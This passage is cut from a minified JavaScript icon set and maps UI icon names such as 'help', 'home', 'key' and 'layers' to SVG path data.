2-2s-.9-2-2-2-2 .9-2 2 .9 2 2 2zm3 4.5A2.5 2.5 0 0 0 13.5 6c-.98 0-1.82.57-2.23 1.39-.6-.78-1.51-1.3-2.56-1.36.18-.49.29-.99.29-1.53C9 2.01 6.99 0 4.5 0S0 2.01 0 4.5 2.01 9 4.5 9c.19 0 .37-.03.56-.06-.03.19-.06.37-.06.56C5 11.43 6.57 13 8.5 13c1.63 0 2.98-1.11 3.37-2.62.44.38 1 .62 1.63.62A2.5 2.5 0 0 0 16 8.5zM14.5 13c-.83 0-1.5.67-1.5 1.5s.67 1.5 1.5 1.5 1.5-.67 1.5-1.5-.67-1.5-1.5-1.5z"],help:["M8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zm1 13H7v-2h2v2zm1.93-6.52c-.14.32-.35.64-.62.97L9.25 8.83c-.12.15-.24.29-.28.42-.04.13-.09.3-.09.52V10H7.12V8.88s.05-.51.21-.71L8.4 6.73c.22-.26.35-.49.44-.68.09-.19.12-.38.12-.58 0-.3-.1-.55-.28-.75-.18-.19-.44-.28-.76-.28-.33 0-.59.1-.78.29-.19.19-.33.46-.4.81-.03.11-.1.15-.2.14l-1.7-.25c-.12-.01-.16-.08-.14-.19.12-.82.46-1.47 1.03-1.94.57-.48 1.32-.72 2.25-.72.47 0 .9.07 1.29.22s.72.34 1 .59c.28.25.49.55.65.89.15.35.22.72.22 1.12s-.07.75-.21 1.08z"],"helper-management":["M13 5h-2v2h2V5zm0 6h-2v2h2v-2zm0-3h-2v2h2V8zm2-8H1C.4 0 0 .4 0 1v14c0 .6.4 1 1 1h14c.6 0 1-.4 1-1V1c0-.6-.4-1-1-1zm-1 14H2V2h12v12zm-7-3H5v2h2v-2zm3 0H8v2h2v-2z"],highlight:["M9.12 11.07l2-2.02.71.71 4-4.04L10.17 0l-4 4.04.71.71-2 2.02 4.24 4.3zM2 12.97h4c.28 0 .53-.11.71-.3l1-1.01-3.42-3.45-3 3.03c-.18.18-.29.44-.29.72 0 .55.45 1.01 1 1.01zm13 1.01H1c-.55 0-1 .45-1 1.01S.45 16 1 16h14c.55 0 1-.45 1-1.01s-.45-1.01-1-1.01z"],history:["M8 3c-.55 0-1 .45-1 1v4c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42L9 7.59V4c0-.55-.45-1-1-1zm0-3a7.95 7.95 0 0 0-6 2.74V1c0-.55-.45-1-1-1S0 .45 0 1v4c0 .55.45 1 1 1h4c.55 0 1-.45 1-1s-.45-1-1-1H3.54C4.64 2.78 6.23 2 8 2c3.31 0 6 2.69 6 6 0 2.61-1.67 4.81-4 5.63v-.01c-.63.23-1.29.38-2 .38-3.31 0-6-2.69-6-6 0-.55-.45-1-1-1s-1 .45-1 1c0 4.42 3.58 8 8 8 .34 0 .67-.03 1-.07.02 0 .04-.01.06-.01C12.98 15.4 16 12.06 16 8c0-4.42-3.58-8-8-8z"],home:["M2 10v5c0 .55.45 1 1 1h3v-5h4v5h3c.55 0 1-.45 1-1v-5L8 4l-6 6zm13.71-2.71L14 5.59V2c0-.55-.45-1-1-1s-1 .45-1 1v1.59L8.71.29C8.53.11 8.28 0 8 0s-.53.11-.71.29l-7 7a1.003 1.003 0 0 0 1.42 1.42L8 2.41l6.29 6.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71z"],"horizontal-bar-chart":["M4 5h7c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1H4c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1zM1 1c-.55 0-1 .45-1 1v13c0 .55.45 1 1 1s1-.45 1-1V2c0-.55-.45-1-1-1zm14 6H4c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h11c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1zm-6 5H4c-.55 0-1 .45-1 1v1c0 .55.45 1 1 1h5c.55 0 1-.45 1-1v-1c0-.55-.45-1-1-1z"],"horizontal-bar-chart-asc":["M1 3h5c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm0 4h7c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1zm14 6H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zM1 11h10c.55 0 1-.45 1-1s-.45-1-1-1H1c-.55 0-1 .45-1 1s.45 1 1 1z"],"horizontal-bar-chart-desc":["M15 1H1c-.55 0-1 .45-1 1s.45 1 1 1h14c.55 0 1-.45 1-1s-.45-1-1-1zM8 9H1c-.55 0-1 .45-1 1s.45 1 1 1h7c.55 0 1-.45 1-1s-.45-1-1-1zm-2 4H1c-.55 0-1 .45-1 1s.45 1 1 1h5c.55 0 1-.45 1-1s-.45-1-1-1zm5-8H1c-.55 0-1 .45-1 1s.45 1 1 1h10c.55 0 1-.45 1-1s-.45-1-1-1z"],"horizontal-distribution":["M2 0c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zm13 0c-.55 0-1 .45-1 1v14c0 .55.45 1 1 1s1-.45 1-1V1c0-.55-.45-1-1-1zm-5 2H7c-.55 0-1 .45-1 1v9c0 .55.45 1 1 1h3c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1z"],"id-number":["M2 5v7h12V5H2zm0-2h12c1.1 0 2 .9 2 2v7c0 1.1-.9 2-2 2H2c-1.1 0-2-.9-2-2V5c0-1.1.9-2 2-2z","M7.9 10.48c-.14-.33-.84-.55-1.3-.75-.46-.2-.4-.33-.42-.5v-.07c.16-.14.29-.33.37-.56 0 0 0-.01.01-.02.02-.05.03-.1.05-.15.1-.01.16-.13.19-.23.03-.04.07-.15.06-.27-.02-.16-.08-.24-.15-.26v-.03c0-.2-.02-.48-.05-.67-.01-.05-.02-.1-.03-.16-.07-.23-.21-.44-.4-.58-.2-.15-.48-.23-.73-.23s-.53.08-.72.23c-.19.14-.33.35-.4.58-.02.05-.03.1-.03.16-.05.18-.06.47-.06.67v.03c-.07.03-.14.1-.15.26-.02.12.03.22.06.27.02.1.09.22.2.24.01.05.03.1.05.15v.01c.08.23.22.42.38.56v.07c-.02.17.03.29-.43.5-.46.2-1.16.42-1.3.75s-.09.52-.09.52H8c-.01 0 .05-.19-.1-.52zM10 6h2c.55 0 1 .45 1 1s-.45 1-1 1h-2c-.55 0-1-.45-1-1s.45-1 1-1zM10 9h2c.55 0 1 .45 1 1s-.45 1-1 1h-2c-.55 0-1-.45-1-1s.45-1 1-1z"],"image-rotate-left":["M13 2h-1.59l.29-.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-2 2C8.11 2.47 8 2.72 8 3c0 .28.11.53.29.71l2 2a1.003 1.003 0 0 0 1.42-1.42l-.3-.29H13c.55 0 1 .45 1 1v3c0 .55.45 1 1 1s1-.45 1-1V5c0-1.66-1.34-3-3-3zm-5.5 9c.28 0 .5-.22.5-.5s-.22-.5-.5-.5-.5.22-.5.5.22.5.5.5zM10 7H1c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1zm-1 6.33L7 12l-1 1-2-3-2 2.67V9h7v4.33z"],"image-rotate-right":["M5.71 5.71l2-2C7.89 3.53 8 3.28 8 3c0-.28-.11-.53-.29-.71l-2-2a1.003 1.003 0 0 0-1.42 1.42l.3.29H3C1.34 2 0 3.34 0 5v3c0 .55.45 1 1 1s1-.45 1-1V5c0-.55.45-1 1-1h1.59l-.3.29a1.003 1.003 0 0 0 1.42 1.42zM12.5 11c.28 0 .5-.22.5-.5s-.22-.5-.5-.5-.5.22-.5.5.22.5.5.5zM15 7H6c-.55 0-1 .45-1 1v7c0 .55.45 1 1 1h9c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1zm-1 6.33L12 12l-1 1-2-3-2 2.67V9h7v4.33z"],import:["M7.29 11.71c.18.18.43.29.71.29s.53-.11.71-.29l4-4a1.003 1.003 0 0 0-1.42-1.42L9 8.59V1c0-.55-.45-1-1-1S7 .45 7 1v7.59l-2.29-2.3a1.003 1.003 0 0 0-1.42 1.42l4 4zM15 11c-.55 0-1 .45-1 1v2H2v-2c0-.55-.45-1-1-1s-1 .45-1 1v3c0 .55.45 1 1 1h14c.55 0 1-.45 1-1v-3c0-.55-.45-1-1-1z"],inbox:["M13.91 2.6c-.16-.36-.51-.61-.92-.61h-10c-.41 0-.77.25-.92.61L-.01 7.45v5.54c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V7.45L13.91 2.6zm-1.92 5.39c-.55 0-1 .45-1 1v1h-6v-1c0-.55-.45-1-1-1H1.94l1.71-4h8.68l1.71 4h-2.05z"],"inbox-filtered":["M6.432 2c.094.14.202.273.324.394L8.42 4H3.66L1.95 8H4c.55 0 1 .45 1 1v1h6.557c.693 0 1.363-.262 1.837-.736l.103-.102.85-1.14a2.564 2.564 0 0 0 .623-1.682V5.058L16 7.46V13c0 .55-.45 1-1 1H1c-.55 0-1-.45-1-1V7.46l2.08-4.85C2.23 2.25 2.59 2 3 2h3.432zm9.048-2c.31 0 .52.26.52.57 0 .16-.06.3-.17.41l-2.86 2.73v2.63c0 .16-.06.3-.17.41l-.82 1.1c-.1.1-.25.17-.41.17-.31 0-.57-.26-.57-.57V3.71L8.17.98A.566.566 0 0 1 8 .57c0-.31.26-.57.57-.57h6.91z"],"inbox-geo":["M6.341 2A5.99 5.99 0 0 0 6 4H3.66L1.95 8H4c.55 0 1 .45 1 1v1h7a5.978 5.978 0 0 0 4-1.528V13c0 .55-.45 1-1 1H1c-.55 0-1-.45-1-1V7.46l2.08-4.85C2.23 2.25 2.59 2 3 2h3.341zm3.679 2.145c0-.125.075-.23.205-.225h.345l.79.8c.005 0 0 .005 0 .005v.295c0 .13-.085.23-.215.23h-.07v.15c0 .13-.09.2-.215.2v.535c0 .125-.12.225-.245.225s-.245-.1-.245-.225V5.25h-.145c-.125 0-.205-.1-.205-.23v-.875zm2.235-2.195c-.03 0-.055-.005-.06-.035 0-.03.03-.035.06-.035h.11c.035 0 .06.005.06.035 0 .03-.03.035-.06.035h-.11zm-1.165-.025a.094.094 0 0 1-.13 0l-.25-.25a.094.094 0 0 1 0-.13.094.094 0 0 1 .13 0l.25.25a.094.094 0 0 1 0 .13zm1.53.445c-.035 0-.07-.025-.07-.06v-.155c0-.03.035-.06.07-.06s.07.025.07.06v.155c0 .03-.035.06-.07.06zM12 0c2.21 0 4 1.79 4 4s-1.79 4-4 4-4-1.79-4-4 1.79-4 4-4zm0 7c1.655 0 3-1.345 3-3 0-.195-.02-.39-.06-.575h-.21c-.125 0-.225-.07-.23-.21h-.215c.075.07.155.14.155.23V3.9c0 .06-.04.115-.075.155h-.015l-.01.005-.015.01-.445.43v.815c0 .13-.07.22-.2.22h-.36c-.125 0-.21-.09-.21-.22v-.84a.627.627 0 0 0-.36-.345h-.45c-.13 0-.245-.095-.245-.225v-.46c0-.125.115-.23.245-.23l.13-.005.21-.215c.09-.09.24-.09.33 0l.22.225h.47c.105 0 .155-.105.225-.21v-.075h-.205a.106.106 0 0 1-.105-.105.11.11 0 0 1 .105-.105h.18l.025.005v-.12s-.03-.025-.04-.025h-.2l-.045.05a.235.235 0 0 1-.33.005l-.045-.06h-.115l.16.175c.015.015.015.06 0 .075-.02.015-.045.02-.06.005l-.195-.185h-.085l-.245.23-.02-.005c-.025.07-.06.055-.095.055-.085 0-.15-.045-.15-.13s.065-.14.15-.14h.115v-.125c0-.06.04-.09.1-.09h.05V2.36c0-.095.095-.2.19-.2h.19c.105 0 .18-.075.18-.185V1.94c0-.015.035.01.035-.06h-.125l-.005.01-.21.22a.085.085 0 0 1-.115 0 .085.085 0 0 1 0-.115l.255-.255c.02-.015.045-.015.065-.015.005 0 .005.015.005.015h.64a2.327 2.327 0 0 0-.355-.275 2.452 2.452 0 0 0-.355-.195c-.03-.015-.055-.03-.08-.04a3.025 3.025 0 0 0-1.735-.175c-.09.02-.175.055-.265.08-.09.03-.18.05-.265.085-.075.03-.145.07-.22.105-.115.06-.235.115-.34.185l-.005.005c-.1.065-.18.145-.27.22h.455c.06 0 .11.045.11.105s-.05.105-.11.105h-.32c0 .07-.025.04-.025.045v.24h.285l.15-.17c.09-.09.235-.105.325-.015.09.09.09.23 0 .32l-.795.79-.01.01c-.005 0-.005 0-.01.005l-.025.015h-.01a.235.235 0 0 1-.12.025h-.23c-.08.07-.125.1-.125.18v.06c0 .01-.02.02-.02.03l.375.39c.04.04.04.1 0 .14-.04.04-.1.04-.14 0l-.39-.385a.213.213 0 0 1-.055.01c-.105 0-.195-.085-.195-.185v-.235h-.055A3.1 3.1 0 0 0 9 4c0 1.655 1.345 3 3 3zm2.27-2.135c.05 0 .105.04.105.09v.285c0 .05-.055.09-.105.09-.05 0-.105-.04-.105-.09v-.285c0-.05.055-.09.105-.09zm-2.085-3.27c0 .13-.105.21-.225.21h-.25v.07c0 .075-.03.135-.105.135s-.105-.06-.105-.135V1.64c-.075-.02-.025-.025-.025-.04 0-.125.085-.215.21-.215h.27c.13 0 .23.085.23.21z"],"inbox-search":["M5.639 2a5.391 5.391 0 0 0-.144 2H3.66L1.95 8H4c.55 0 1 .45 1 1v1h6V9c0-.088.012-.174.033-.255.12-.007.238-.019.39-.038.154-.008.252-.03.442-.077a5.34 5.34 0 0 0 .24-.05h.05l.122-.04 1.266 1.271c.425.47 1.116.769 1.847.769.21 0 .414-.025.61-.071V13c0 .55-.45 1-1 1H1c-.55 0-1-.45-1-1V7.46l2.08-4.85C2.23 2.25 2.59 2 3 2h2.639zM15.82 7.53c.1.12.17.27.18.44 0 .34-.27.61-.61.61a.57.57 0 0 1-.43-.18l-2.24-2.25c-.13.08-.26.16-.4.23-.02.01-.05.02-.07.03-.14.06-.27.12-.42.17h-.01c-.14.05-.29.08-.44.11-.04.01-.08.02-.11.02-.15.02-.3.04-.46.04-1.85 0-3.35-1.51-3.35-3.37S8.96.01 10.81 0c1.85 0 3.35 1.51 3.35 3.37 0 .16-.02.31-.04.47-.01.04-.01.07-.02.11-.02.15-.05.29-.1.44v.01c-.05.15-.11.28-.17.42-.01.02-.02.05-.03.07-.07.14-.14.27-.23.4l2.25 2.24zm-5.01-1.94c1.22 0 2.21-.99 2.21-2.22 0-1.23-.99-2.22-2.21-2.22S8.6 2.14 8.6 3.37c0 1.22.99 2.22 2.21 2.22z"],"inbox-update":["M8.1 2a5.023 5.023 0 0 0 0 2H3.66L1.95 8H4c.55 0 1 .45 1 1v1h6V9c0-.55.45-1 1-1h2.05c.708 0 1.352-.241 1.905-.645L16 7.46V13c0 .55-.45 1-1 1H1c-.55 0-1-.45-1-1V7.46l2.08-4.85C2.23 2.25 2.59 2 3 2h5.1zM13 6a3 3 0 1 1 0-6 3 3 0 0 1 0 6z"],"info-sign":["M8 0C3.58 0 0 3.58 0 8s3.58 8 8 8 8-3.58 8-8-3.58-8-8-8zM7 3h2v2H7V3zm3 10H6v-1h1V7H6V6h3v6h1v1z"],inheritance:["M5 8c0 1.66 1.34 3 3 3h4.59L11.3 9.71A.965.965 0 0 1 11 9a1.003 1.003 0 0 1 1.71-.71l3 3c.18.18.29.43.29.71 0 .28-.11.53-.29.71l-3 3a1.003 1.003 0 0 1-1.42-1.42l1.3-1.29H8c-2.76 0-5-2.24-5-5H1a1 1 0 0 1-1-1V1a1 1 0 0 1 1-1h6a1 1 0 0 1 1 1v6a1 1 0 0 1-1 1H5zM2 2v4h4V2H2z"],"inner-join":["M6.6 3.3C5.3 4.4 4.5 6.1 4.5 8s.8 3.6 2.1 4.7c-.5.2-1 .3-1.6.3-2.8 0-5-2.2-5-5s2.2-5 5-5c.6 0 1.1.1 1.6.3zm-1.96 8.68C3.92 10.83 3.5 9.46 3.5 8s.42-2.83 1.14-3.98C2.6 4.2 1 5.91 1 8s1.6 3.8 3.64 3.98zM8 4c-1.2.9-2 2.4-2 4s.8 3.1 2 4c1.2-.9 2-2.3 2-4s-.8-3.1-2-4zm3-1c2.8 0 5 2.2 5 5s-2.2 5-5 5c-.6 0-1.1-.1-1.6-.3 1.3-1.1 2.1-2.9 2.1-4.7s-.8-3.5-2.1-4.7c.5-.2 1-.3 1.6-.3zm.35 1.02c.73 1.15 1.14 2.52 1.14 3.98s-.42 2.83-1.14 3.98c2.04-.18 3.64-1.9 3.64-3.98s-1.6-3.8-3.64-3.98z"],insert:["M5 9h2v2c0 .6.4 1 1 1s1-.4 1-1V9h2c.6 0 1-.4 1-1s-.4-1-1-1H9V5c0-.6-.4-1-1-1s-1 .4-1 1v2H5c-.6 0-1 .4-1 1s.4 1 1 1zm10-9H1C.4 0 0 .4 0 1v14c0 .6.4 1 1 1h14c.6 0 1-.4 1-1V1c0-.6-.4-1-1-1zm-1 14H2V2h12v12z"],intersection:["M10 3c-.92 0-1.76.26-2.5.69C6.76 3.26 5.92 3 5 3 2.24 3 0 5.24 0 8s2.24 5 5 5c.92 0 1.76-.26 2.5-.69.74.43 1.58.69 2.5.69 2.76 0 5-2.24 5-5s-2.24-5-5-5zm-4.1 7.85c-.29.09-.59.15-.9.15-1.66 0-3-1.34-3-3s1.34-3 3-3c.31 0 .61.06.9.15C5.33 5.96 5 6.94 5 8s.33 2.04.9 2.85zM10 11c-.31 0-.61-.06-.9-.15.57-.81.9-1.79.9-2.85s-.33-2.04-.9-2.85c.29-.09.59-.15.9-.15 1.66 0 3 1.34 3 3s-1.34 3-3 3z"],"ip-address":["M5 2.66C5 4.14 8 8 8 8s3-3.86 3-5.34C10.99 1.2 9.66 0 8 0S5 1.2 5 2.66zM7 3c0-.55.45-1 1-1s1 .45 1 1-.45 1-1 1-1-.45-1-1zM10.5 10H8v5h1v-4h1v1H9v1h2v-3h-.5zM2 9h12c.55 0 1 .45 1 1v5c0 .55-.45 1-1 1H2c-.55 0-1-.45-1-1v-5c0-.55.45-1 1-1zm4 1v5h1v-5H6z"],issue:["M8 16A8 8 0 1 1 8 0a8 8 0 0 1 0 16zm0-2A6 6 0 1 0 8 2a6 6 0 0 0 0 12zm1-2H7v-2h2v2zm0-3H7V4h2v5z"],"issue-closed":["M9.296.104a2.99 2.99 0 0 0-1.003.664 2.987 2.987 0 0 0-.75 1.25 6 6 0 1 0 6.28 4.527c.043-.039.085-.079.127-.12l1.456-1.456A8 8 0 1 1 9.296.105zm2.532 5.2a.997.997 0 0 1-.707-.294L9.707 3.596a1 1 0 0 1 1.414-1.414l.707.707 1.768-1.768a1 1 0 1 1 1.414 1.415L12.536 5.01a.997.997 0 0 1-.708.293zM9 12H7v-2h2v2zm0-3H7V4h2v5z"],"issue-new":["M10.568.421c-.01.04-.018.08-.026.121-.837.156-1.53.73-1.85 1.497a6 6 0 1 0 5.27 5.273 2.51 2.51 0 0 0 1.496-1.854c.04-.008.081-.016.121-.026A8 8 0 1 1 10.568.421zM9 12H7v-2h2v2zm0-3H7V4h2v5zm1-6c0-.55.45-1 1-1h1V1c0-.55.45-1 1-1s1 .45 1 1v1h1c.55 0 1 .45 1 1s-.45 1-1 1h-1v1.005c0 .55-.45 1-1 1s-1-.45-1-1V4h-1c-.55 0-1-.45-1-1z"],italic:["M9.8 4H11c.5 0 1-.4 1-1s-.4-1-1-1H7c-.5 0-1 .4-1 1s.4 1 1 1h.8l-1.6 8H5c-.5 0-1 .4-1 1s.4 1 1 1h4c.5 0 1-.4 1-1s-.4-1-1-1h-.8l1.6-8z"],"join-table":["M15 5h-3V2c0-.55-.45-1-1-1H1c-.55 0-1 .45-1 1v8c0 .55.45 1 1 1h3v3c0 .55.45 1 1 1h10c.55 0 1-.45 1-1V6c0-.55-.45-1-1-1zm-5-1v2H6V4h4zm0 6H6V7h4v3zM2 4h3v2H2V4zm0 5V7h3v2H2zm4 4v-2h4v2H6zm8 0h-3v-2h3v2zm0-3h-3V8h3v2z"],key:["M11 0C8.24 0 6 2.24 6 5c0 1.02.31 1.96.83 2.75L.29 14.29a1.003 1.003 0 0 0 1.42 1.42L3 14.41l1.29 1.29c.18.19.43.3.71.3s.53-.11.71-.29l2-2c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71L6.41 11l1.83-1.83c.8.52 1.74.83 2.76.83 2.76 0 5-2.24 5-5s-2.24-5-5-5zm0 8c-.23 0-.45-.03-.66-.08-.01 0-.02-.01-.03-.01-.21-.05-.41-.12-.6-.21a3.014 3.014 0 0 1-1.62-2c0-.01-.01-.02-.01-.03C8.03 5.45 8 5.23 8 5c0-1.66 1.34-3 3-3s3 1.34 3 3-1.34 3-3 3z"],"key-backspace":["M15 2H6c-.28 0-.53.11-.71.29l-5 5C.11 7.47 0 7.72 0 8c0 .28.11.53.29.71l5 5c.18.18.43.29.71.29h9c.55 0 1-.45 1-1V3c0-.55-.45-1-1-1zm-2.29 7.29a1.003 1.003 0 0 1-1.42 1.42L10 9.41 8.71 10.7c-.18.19-.43.3-.71.3a1.003 1.003 0 0 1-.71-1.71L8.59 8l-1.3-1.29a1.003 1.003 0 0 1 1.42-1.42L10 6.59l1.29-1.29c.18-.19.43-.3.71-.3a1.003 1.003 0 0 1 .71 1.71L11.41 8l1.3 1.29z"],"key-command":["M12 9h-1V7h1c1.66 0 3-1.34 3-3s-1.34-3-3-3-3 1.34-3 3v1H7V4c0-1.66-1.34-3-3-3S1 2.34 1 4s1.34 3 3 3h1v2H4c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3v-1h2v1c0 1.66 1.34 3 3 3s3-1.34 3-3-1.34-3-3-3zm0-6c.55 0 1 .45 1 1s-.45 1-1 1-1-.45-1-1 .45-1 1-1zM4 13c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm0-8c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm5 4H7V7h2v2zm3 4c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"],"key-control":["M12.71 5.29l-4-4C8.53 1.11 8.28 1 8 1s-.53.11-.71.29l-4 4a1.003 1.003 0 0 0 1.42 1.42L8 3.41l3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71z"],"key-delete":["M15.71 7.29l-5-5A.997.997 0 0 0 10 2H1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h9c.28 0 .53-.11.71-.29l5-5c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71zm-7 2a1.003 1.003 0 0 1-1.42 1.42L6 9.41 4.71 10.7c-.18.19-.43.3-.71.3a1.003 1.003 0 0 1-.71-1.71L4.59 8l-1.3-1.29a1.003 1.003 0 0 1 1.42-1.42L6 6.59 7.29 5.3c.18-.19.43-.3.71-.3a1.003 1.003 0 0 1 .71 1.71L7.41 8l1.3 1.29z"],"key-enter":["M14 2c-.55 0-1 .45-1 1v3c0 1.66-1.34 3-3 3H4.41L5.7 7.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-3 3c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l3 3a1.003 1.003 0 0 0 1.42-1.42L4.41 11H10c2.76 0 5-2.24 5-5V3c0-.55-.45-1-1-1z"],"key-escape":["M2 7c.55 0 1-.45 1-1V4.41L7.29 8.7c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L4.41 3H6c.55 0 1-.45 1-1s-.45-1-1-1H2c-.55 0-1 .45-1 1v4c0 .55.45 1 1 1zm7-5.9v2A5 5 0 1 1 3.1 9h-2c.49 3.39 3.38 6 6.9 6 3.87 0 7-3.13 7-7 0-3.52-2.61-6.41-6-6.9z"],"key-option":["M11 4h4c.55 0 1-.45 1-1s-.45-1-1-1h-4c-.55 0-1 .45-1 1s.45 1 1 1zm4 8h-3.43L5.86 2.49h-.02A.975.975 0 0 0 5 2H1c-.55 0-1 .45-1 1s.45 1 1 1h3.43l5.71 9.51.01-.01c.18.3.49.5.85.5h4c.55 0 1-.45 1-1s-.45-1-1-1z"],"key-shift":["M13.71 7.29l-5-5C8.53 2.11 8.28 2 8 2s-.53.11-.71.29l-5 5A1.003 1.003 0 0 0 3 9h2v4c0 .55.45 1 1 1h4c.55 0 1-.45 1-1V9h2a1.003 1.003 0 0 0 .71-1.71z"],"key-tab":["M15 10H4.41L5.7 8.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L2 9.59V8c0-.55-.45-1-1-1s-1 .45-1 1v6c0 .55.45 1 1 1s1-.45 1-1v-1.59l2.29 2.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L4.41 12H15c.55 0 1-.45 1-1s-.45-1-1-1zm0-9c-.55 0-1 .45-1 1v1.59L11.71 1.3A.965.965 0 0 0 11 1a1.003 1.003 0 0 0-.71 1.71L11.59 4H1c-.55 0-1 .45-1 1s.45 1 1 1h10.59L10.3 7.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L14 6.41V8c0 .55.45 1 1 1s1-.45 1-1V2c0-.55-.45-1-1-1z"],"known-vehicle":["M15 3a.997.997 0 0 0-.707.293L12 5.586l-1.293-1.293a1 1 0 1 0-1.414 1.414l2 2a.997.997 0 0 0 1.414 0l3-3A1 1 0 0 0 15 3zm-.879 6.121l-.007-.007c-.313.309-.69.552-1.114.702V10h-.998H12h-1v-.184c-.424-.15-.8-.395-1.112-.704l-.01.01-2-2 .012-.012A2.978 2.978 0 0 1 7.184 6H3c-.176 0-.06-.824 0-1l.73-1.63C3.79 3.192 3.823 3 4 3H7.78C8.328 2.39 9.115 2 10 2c.768 0 1.461.293 1.987.77l.844-.844c-.238-.244-.524-.442-.794-.524C12.037 1.402 10.72 1 8 1c-2.72 0-4.037.402-4.037.402-.508.155-1.078.711-1.268 1.237l-.763 2.117H.88c-.484 0-.88.423-.88.939s.396.939.88.939h.375L1 7c-.034.685 0 1.436 0 2v5c0 .657.384 1 1 1s1-.343 1-1v-1h10v1c0 .657.384 1 1 1s1-.343 1-1V9l-.003-.754-.876.875zM5.001 10H3V8h2v2z"],label:["M11 2H1c-.55 0-1 .45-1 1v10c0 .55.45 1 1 1h14c.55 0 1-.45 1-1V7l-5-5zm3 10H2V4h8v2H3v1h7v1h4v4zm-3-5V4l3 3h-3zm-8 3h10V9H3v1z"],layer:["M16 8c0-.37-.21-.68-.51-.85l.01-.01-7-4-.01.01C8.34 3.06 8.18 3 8 3s-.34.06-.49.15l-.01-.02-7 4 .01.01C.21 7.32 0 7.63 0 8s.21.68.51.85l-.01.01 7 4 .01-.01c.15.09.31.15.49.15s.34-.06.49-.15l.01.01 7-4-.01-.01c.3-.17.51-.48.51-.85z"],layers:["M.55 4.89l7 3.5c.14.07.29.11.45.11s.31-.04.45-.11l7-3.5a.998.998 0 0 0-.06-1.81L8.4.08a1.006 1.006 0 0 0-.79 0l-6.99 3a.992.992 0 0 0-.07 1.81zM15 10c-.16 0-.31.04-.45.11L8 13.38 1.45 10.1c-.14-.06-.29-.1-.45-.1-.55 0-1 .45-1 1 0 .39.23.73.55.89l7 3.5c.14.07.29.11.45.11s.31-.04.45-.11l7-3.5c.32-.16.55-.5.55-.89 0-.55-.45-1-1-1zm0-3.5c-.16 0-.31.04-.45.11L8 9.88 1.45 6.61A.997.997 0 0 0 1 6.5c-.55 0-1 .45-1 1 0 .39.23.73.55.89l7 3.5c.14.07.29.11.45.11s.31-.04.45-.11l7-3.5c.32-.16.55-.5.55-.89 0-.55-.45-1-1-1z"],layout:["M14 4c-1.1 0-2 .9-2 2 0 .47.17.9.44 1.24l-.68.91A1.996 1.996 0 0 0 9.07 9.5H7.93C7.71 8.64 6.93 8 6 8c-.47 0-.9.17-1.24.44l-.91-.68c.1-.23.15-.49.15-.76 0-.37-.11-.71-.28-1.01l2.27-2.27c.3.17.64.28 1.01.28 1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2c0 .37.11.71.28 1.01L3.01 5.28C2.71 5.11 2.37 5 2 5 .9 5 0 5.9 0 7s.9 2 2 2c.47 0 .9-.17 1.24-.44l.91.68c-.1.23-.15.49-.15.76 0 .37.11.71.28 1.01l-1.27 1.27C2.71 12.11 2.37 12 2 12c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2c0-.37-.11-.71-.28-1.01l1.27-1.27c.3.17.64.28 1.01.28.93 0 1.71-.64 1.93-1.5h1.14c.22.86 1 1.5 1.93 1.5 1.1 0 2-.9 2-2 0-.47-.17-.9-.44-1.24l.68-.91c.23.1.49.15.76.15 1.1 0 2-.9 2-2s-.9-2-2-2z"],"layout-auto":["M14 9.5c-.56 0-1.06.23-1.42.59L8.99 8l3.59-2.09A2.002 2.002 0 0 0 16 4.5c0-1.1-.9-2-2-2s-2 .9-2 2c0 .19.03.37.08.54L8.5 7.13v-3.2c.86-.22 1.5-1 1.5-1.93 0-1.1-.9-2-2-2S6 .9 6 2c0 .93.64 1.71 1.5 1.93v3.2L3.92 5.04c.05-.17.08-.35.08-.54 0-1.1-.9-2-2-2s-2 .9-2 2 .9 2 2 2c.56 0 1.06-.23 1.42-.59L7.01 8l-3.59 2.09A2.002 2.002 0 0 0 0 11.5c0 1.1.9 2 2 2s2-.9 2-2c0-.19-.03-.37-.08-.54L7.5 8.87v3.2c-.86.22-1.5 1-1.5 1.93 0 1.1.9 2 2 2s2-.9 2-2c0-.93-.64-1.71-1.5-1.93v-3.2l3.58 2.09c-.05.17-.08.35-.08.54 0 1.1.9 2 2 2s2-.9 2-2-.9-2-2-2z"],"layout-balloon":["M14 11c-.2 0-.38.04-.56.09L12.42 9.4c.36-.36.58-.85.58-1.4 0-.55-.22-1.04-.58-1.4l1.01-1.69c.19.05.37.09.57.09 1.1 0 2-.9 